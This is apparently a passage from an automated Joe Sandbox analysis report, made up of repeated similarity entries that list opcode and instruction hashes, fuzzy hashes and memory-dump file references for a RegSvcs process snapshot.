                                                                                              • Opcode ID: 76417276c03a799d6847743912f8b4091975eabe258a0f3d3d68b251c02eb10e
                                                                                              • Instruction ID: c0bac382a650fe5950746f3dae9eae7011d5b1c786c566e4d594f50f8bbdab7c
                                                                                              • Opcode Fuzzy Hash: 76417276c03a799d6847743912f8b4091975eabe258a0f3d3d68b251c02eb10e
                                                                                              • Instruction Fuzzy Hash: 8FD1F171E0060A9BEF05CF69C845AFEBBF1AF88304F18C16AD995E7241E735E905CB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 201eeea6003ba2c26d3b7e34aae94a81aff8ff8aacd9e6be66153fbf0d3982d7
                                                                                              • Instruction ID: efd9e3d0185d619b44a501d24e7d148aff6a4b38530a556268e5abd3d4ec27ec
                                                                                              • Opcode Fuzzy Hash: 201eeea6003ba2c26d3b7e34aae94a81aff8ff8aacd9e6be66153fbf0d3982d7
                                                                                              • Instruction Fuzzy Hash: D7E19D71A08385CFC714CF29C480A6ABBE0FFA8358F15896DE995CB351DB31E905DB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 545128e5d5c7f0c03df9c3f19d11949dee590c49b0e857c30cccd78e0cd324f6
                                                                                              • Instruction ID: a3061d58a949aa312bdf2581976c9cd94385a421ba24e354ffd9e4e9ebbb9ab4
                                                                                              • Opcode Fuzzy Hash: 545128e5d5c7f0c03df9c3f19d11949dee590c49b0e857c30cccd78e0cd324f6
                                                                                              • Instruction Fuzzy Hash: 49D1D472A002069BCB14DF65CC81BBA77E6FF84358F18416AF955DB381EB34D942EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                              • Instruction ID: bc08dc7ebacfe490a7a33d8e58cd44cedbdc5fb0ac4edaaceb2b6dc719814dac
                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                              • Instruction Fuzzy Hash: 09B15074A00705AFDF64DB99C940AABBBFDBF84304F14846EAA8297794DB35E905CB10
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                              • Instruction ID: 91c443a59904e0faae016365342cabe80ca262c33702cb0e8a701235693c71eb
                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                              • Instruction Fuzzy Hash: 4FB12F72600649AFDB15DF68C890BBEBBF6AF44300F1801A5E691D7392DB74ED41EB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c427ee7bdb18c1ec6130ea3de33d0426a6bb00ea6017691235817d1490a6623f
                                                                                              • Instruction ID: bdd2c68f4b36a2102df29776503acec10fd8605614e45fe5c2f32c19ce6de6c9
                                                                                              • Opcode Fuzzy Hash: c427ee7bdb18c1ec6130ea3de33d0426a6bb00ea6017691235817d1490a6623f
                                                                                              • Instruction Fuzzy Hash: C9C188B46083818FD760DF19C484BAAB7E5FF88344F44496EE98987290DB74E949CF92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6a27bcb8cff8ea574758a344f0f8b364a30f1cdad8e372445bb642340c4e1e5
                                                                                              • Instruction ID: 768103f1985a879380710ed244de2ea60892020b1658b4b8a40a216a0ae2bc9c
                                                                                              • Opcode Fuzzy Hash: b6a27bcb8cff8ea574758a344f0f8b364a30f1cdad8e372445bb642340c4e1e5
                                                                                              • Instruction Fuzzy Hash: F1B1A170A002668BDB64DF54C890BA9B3F6EF44700F1885EAD54AE7381EB34ED85DF60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 365be6736c99389877dde049bba59bb6c8a7165a2f852cd379a56a12c3978dcb
                                                                                              • Instruction ID: 4d3b5ce7a092f65863512a4a9be2393d582e1b764f80589f68d69eda12c013c8
                                                                                              • Opcode Fuzzy Hash: 365be6736c99389877dde049bba59bb6c8a7165a2f852cd379a56a12c3978dcb
                                                                                              • Instruction Fuzzy Hash: 7FA1F571E0021A9FEB229B5CD984BAEBBE4BB04754F050565EAC0BB2D1D7789D40CBD1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ed0755ea3f791cafc1715ef0102190a11c458571e837adf694bb5bf84b242ec3
                                                                                              • Instruction ID: 702832939e9a4736ed1bebba8a9c98fdd33879662536b051940972568f4708c3
                                                                                              • Opcode Fuzzy Hash: ed0755ea3f791cafc1715ef0102190a11c458571e837adf694bb5bf84b242ec3
                                                                                              • Instruction Fuzzy Hash: 56A1C1B0B0072ADFDB65CF69C890BAAB7F5FF44314F008169EA8597285DB34E815CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 24d2a993b2b8b4d82b63d20cf46f9873005edc1272ea1d787b81d6af15ff6711
                                                                                              • Instruction ID: 87c707f29940d2ac5b35905cb8a603fd7c7e3f4857521f86f4097839a7d307cd
                                                                                              • Opcode Fuzzy Hash: 24d2a993b2b8b4d82b63d20cf46f9873005edc1272ea1d787b81d6af15ff6711
                                                                                              • Instruction Fuzzy Hash: D0A1BF72A04611AFC711DF18C980BAAB7E9FF48704F450568F686DB662D739EE00CB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dcc94b08e78828a37b12ed7107668ea66a11383b14e9616675b275d9a08c8c85
                                                                                              • Instruction ID: b6e3335c3aa4284456efdc5cee773a40db190c345b1fd3c5961ad51314c7035a
                                                                                              • Opcode Fuzzy Hash: dcc94b08e78828a37b12ed7107668ea66a11383b14e9616675b275d9a08c8c85
                                                                                              • Instruction Fuzzy Hash: 4991C671D00626AFDB15CF58D890BBEBFB9AF48710F154159E690EB341D736DE009BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9aaa4ea9a0c78fa1d3f8de60a525e8b287a2d4691bd97360ed13a3e95abfa79e
                                                                                              • Instruction ID: 8a63a3ac83c984882f8acd186fb33e76555a59c93c2ac8e73e1141e4482ece3e
                                                                                              • Opcode Fuzzy Hash: 9aaa4ea9a0c78fa1d3f8de60a525e8b287a2d4691bd97360ed13a3e95abfa79e
                                                                                              • Instruction Fuzzy Hash: AC910776A00619CBDB24DB58C880B7EB7A1EF88718F1940B9EE45DB3B1E638DD01E751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f7ee203d37425883ea31a66e673050c1ca037a692c0464c344b2816125f97510
                                                                                              • Instruction ID: ada87a84f3e28985a79973eb3b041d8ad18de47f389259330f713374c64471b4
                                                                                              • Opcode Fuzzy Hash: f7ee203d37425883ea31a66e673050c1ca037a692c0464c344b2816125f97510
                                                                                              • Instruction Fuzzy Hash: 87819671E00619AFDB18CF69D890ABEBBF9FB88700F04852EE585D7640E735DA41CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                              • Instruction ID: dada368e76227e49c25e16514aa568965bca3efa9092d9bf27281260da5bde47
                                                                                              • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                                                              • Instruction Fuzzy Hash: 6B818071B00209DFDF19DF98C880AAEBBF6AF84310F588569D9969B385D734E901CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2bab21986c062ff52b28b6925739f90305a0d51e80fcfc17c351308f26c1cc79
                                                                                              • Instruction ID: be67b11fcb25e7f5ff7dfe57bc77d38da0299abc1cd7842b0655f1076c05e1d0
                                                                                              • Opcode Fuzzy Hash: 2bab21986c062ff52b28b6925739f90305a0d51e80fcfc17c351308f26c1cc79
                                                                                              • Instruction Fuzzy Hash: B1818471A00609DFDB56CFA9C880BEEBBF9FF48314F108429E995A7254D734AC45CB60
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4333b5e99016d76bf72ae29e219018fd33aed0c710cecec91cfa5c15de038b24
                                                                                              • Instruction ID: 89942795cc7a576a48ab6abd626ae1ce2aefc6d4c9569c01bfd5a0e06919531e
                                                                                              • Opcode Fuzzy Hash: 4333b5e99016d76bf72ae29e219018fd33aed0c710cecec91cfa5c15de038b24
                                                                                              • Instruction Fuzzy Hash: 7071E2B6C05629DBCB259F98C5807BEBBF0FF48710F14856AE982AB350D3349800DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e60460465c52301b036961ebf1f5feb5821262c263c5d2b981ea1d23f6bbd758
                                                                                              • Instruction ID: 59d25295548a63b80add96e0d9b46e7e1fe2b23237e52ecefb421f07c3e4f4ca
                                                                                              • Opcode Fuzzy Hash: e60460465c52301b036961ebf1f5feb5821262c263c5d2b981ea1d23f6bbd758
                                                                                              • Instruction Fuzzy Hash: 9971AD74D042669FCB15DF59C844ABABBF5EF49300F08C4AAE9D8DB201E335EA45C7A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1a1f453f6ed5ec8010c34d3465837f934482469adcc4d7d7809aab4ae520bf35
                                                                                              • Instruction ID: bda44fa505bdc8f5382dccd812b43a2523777eb863a305cbfe3a426c054bf9b8
                                                                                              • Opcode Fuzzy Hash: 1a1f453f6ed5ec8010c34d3465837f934482469adcc4d7d7809aab4ae520bf35
                                                                                              • Instruction Fuzzy Hash: 97718070D01205EFDF20DF99DA60A9EBBF8FF85300F11419AEA90EB258C73A8945DB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a95c35015c57bce891dcc3ab20abae94debd46c37dc14d44fe823ca66d9825f4
                                                                                              • Instruction ID: 40a1b7aa19e7e1a4071e1d0490ef05080994eacc7c2a8f55cc9e8ee9226594a3
                                                                                              • Opcode Fuzzy Hash: a95c35015c57bce891dcc3ab20abae94debd46c37dc14d44fe823ca66d9825f4
                                                                                              • Instruction Fuzzy Hash: C771E272A046469FC751DF28C480B7AB7E5FF84310F0485AAE998CB362EB38DC45DB91
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                              • Instruction ID: 2033b522c2298fc990bbaef6838da57cb8a053dc24c914cbf755203db9a2af7b
                                                                                              • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                                                              • Instruction Fuzzy Hash: 40714C71A00619EFDB10DFA9C984AEEBBF9FF48700F104569E645EB251DB34EA41CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 68249984a02f9eb9e67cad37b24dd4ac5157b94d81f17e2364085bbf5d9693e3
                                                                                              • Instruction ID: 2127cd69d5d0ebee926240588f1231fbdf31946f500607f6c6e3a8a88f71bdf9
                                                                                              • Opcode Fuzzy Hash: 68249984a02f9eb9e67cad37b24dd4ac5157b94d81f17e2364085bbf5d9693e3
                                                                                              • Instruction Fuzzy Hash: 67710531600B01AFFB32DF58C844F6ABBF6EF44720F148458E696872A1DB76E944CB54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 045009ca4af679359ac7416b4727475b3741d50c32a40483e048aaaa82493906
                                                                                              • Instruction ID: eee04bcecddca86581b4a5882414eae72a0eb404ea2288b11ed45883b03a5e99
                                                                                              • Opcode Fuzzy Hash: 045009ca4af679359ac7416b4727475b3741d50c32a40483e048aaaa82493906
                                                                                              • Instruction Fuzzy Hash: 3A8101B2B05345CFDB24CF98E584BAD77F2BF88310F1541A9E944AB291CB399D01DB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cd8e6984c7bb816967b46e576808f50b4244bfc33022a3e3cae3b1ad35ebec3b
                                                                                              • Instruction ID: f5367c5f7f35de6836b020400cc353bacee9228c45f414c0c4f5ed47921db18e
                                                                                              • Opcode Fuzzy Hash: cd8e6984c7bb816967b46e576808f50b4244bfc33022a3e3cae3b1ad35ebec3b
                                                                                              • Instruction Fuzzy Hash: D751C172604712EFDB11DE68C894F5BBBE8EBC8750F014529BA90DB150DB31DD04CBA2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 69c487f1feeb81bf5a122a2705ce294edc045ff92be54652f24c3b04d372105f
                                                                                              • Instruction ID: e9bfd458a38e4a4716831cfdcc3c4915b1d5e47d7ec02518bca27cf23804aa58
                                                                                              • Opcode Fuzzy Hash: 69c487f1feeb81bf5a122a2705ce294edc045ff92be54652f24c3b04d372105f
                                                                                              • Instruction Fuzzy Hash: C051F171904709DFD721EF9AC880AABFBF9BF54710F50861EE2D2576A1CBB0A941CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4f7b964dfbb98b67f42188645f56f66a69931b39ab278405ba4454a6024f1bf6
                                                                                              • Instruction ID: ef5ab607b72901d0322a3273dcc81811357e6ec576b245e458d81dc6ed6f78be
                                                                                              • Opcode Fuzzy Hash: 4f7b964dfbb98b67f42188645f56f66a69931b39ab278405ba4454a6024f1bf6
                                                                                              • Instruction Fuzzy Hash: F6516171640615DFCB62EFA8C990EAAB7FDFF04784F4104A9EA8297661D738ED40CB50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 957871aa7faf292f3df96986e4d607087c095eae8c788f06b0fe066696a96b24
                                                                                              • Instruction ID: ad0482a0d7f82d398b536fcae5982877436a4806ee908f7a58beaa44f4379a04
                                                                                              • Opcode Fuzzy Hash: 957871aa7faf292f3df96986e4d607087c095eae8c788f06b0fe066696a96b24
                                                                                              • Instruction Fuzzy Hash: 0B5189716083029FD754EF29C880A6BBBE5BFD8204F44892DF5C9C7250EB30D905CB96
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                              • Instruction ID: cdb56877cc9c9eb3452bebce302b07a14783407af43e789b1cf8e39e1abdfd20
                                                                                              • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                                                              • Instruction Fuzzy Hash: 2951A571E0021A9BEF16DF94C840BEEBBB5BF49350F0440A9EA45EB280D774DD44CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                              • Instruction ID: 6f90c451a72a6cce90f3664872cd90747813eb78beea6121bf341688dfe1cd32
                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                              • Instruction Fuzzy Hash: 8751A635D00319EFEF21DF94C884BAFBBBDAF00324F154665D69267191D7349E448BA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7691c7a546ea33829dde6b907b4b3f6c35aaf8a48c20c93bf3e5c7f45018269
                                                                                              • Instruction ID: 0eb604366d88dd786eb8211fb311d2aa6b57f5d21821b5068850332c39141024
                                                                                              • Opcode Fuzzy Hash: c7691c7a546ea33829dde6b907b4b3f6c35aaf8a48c20c93bf3e5c7f45018269
                                                                                              • Instruction Fuzzy Hash: 6D4108707016059BD769DBADC894BBFBBDAFF90621F88C25AE9D587280DB30D801C790
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33ef0425ff8cd62cfec966a8b6fc8a5df36deb4eb139cec9db9baaa149372d15
                                                                                              • Instruction ID: 91eb6f7132f812502aa0874d19b946525e7a8844892865db02c429ef0d36e273
                                                                                              • Opcode Fuzzy Hash: 33ef0425ff8cd62cfec966a8b6fc8a5df36deb4eb139cec9db9baaa149372d15
                                                                                              • Instruction Fuzzy Hash: 0B519D71900219DFDB60DFA9CA809AEBBF9FF48358B144559E9C5A3305DB39AD01CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bb1c753dbec3f2829b3fbf083fe63b2e4dc59a7130b9a75ed6a46b3bf30b33ed
                                                                                              • Instruction ID: b266f6de77560de89323d199d0fa9afef68aa0bbb8a1cdbc07d80b0fad4dd277
                                                                                              • Opcode Fuzzy Hash: bb1c753dbec3f2829b3fbf083fe63b2e4dc59a7130b9a75ed6a46b3bf30b33ed
                                                                                              • Instruction Fuzzy Hash: E8410671742241DBDB69EE68D881BBA36A5EB58708F41006DEEC19B249DBBFD800C760
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                              • Instruction ID: 59026fd29355f68aafd79770c3b1ee62e38ad0d33964c4e800efcc9aab97821b
                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                              • Instruction Fuzzy Hash: E9412B31700706DFDB25CF98C990A6AB7E9FF94310B44466EE9928B681EB30ED04C7D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4ba0f3450256ef7bf1d02a802fef3a603eca1b85b6526c39eeb9b3f979727428
                                                                                              • Instruction ID: d022c11f3dd9ce452d83b78d3aafd56d041e05e6e83c987fedd43aa458caefe3
                                                                                              • Opcode Fuzzy Hash: 4ba0f3450256ef7bf1d02a802fef3a603eca1b85b6526c39eeb9b3f979727428
                                                                                              • Instruction Fuzzy Hash: 1F41BD36A00219DBDB14DF98C440AEEBBB4BF48710F14816AF9D5FB258D7399D81CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2420137420.0000000000FB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FB0000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_fb0000_RegSvcs.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 83addb6918e359e7219db1bb4f45e4f4eddb7342dc159510f18ca16855a782d1
                                                                                              • Instruction ID: 1f13647ee2cd6cb7d1028117db974a7d8f1c37f8a612889e390ce2f8e77926e3
                                                                                              • Opcode Fuzzy Hash: 83addb6918e359e7219db1bb4f45e4f4eddb7342dc159510f18ca16855a782d1
                                                                                              • Instruction Fuzzy Hash: 7B41E6B12043059FE765EF28C880A6BB7E5FF88314F044C7AEAD6D7252DB36E4458B51
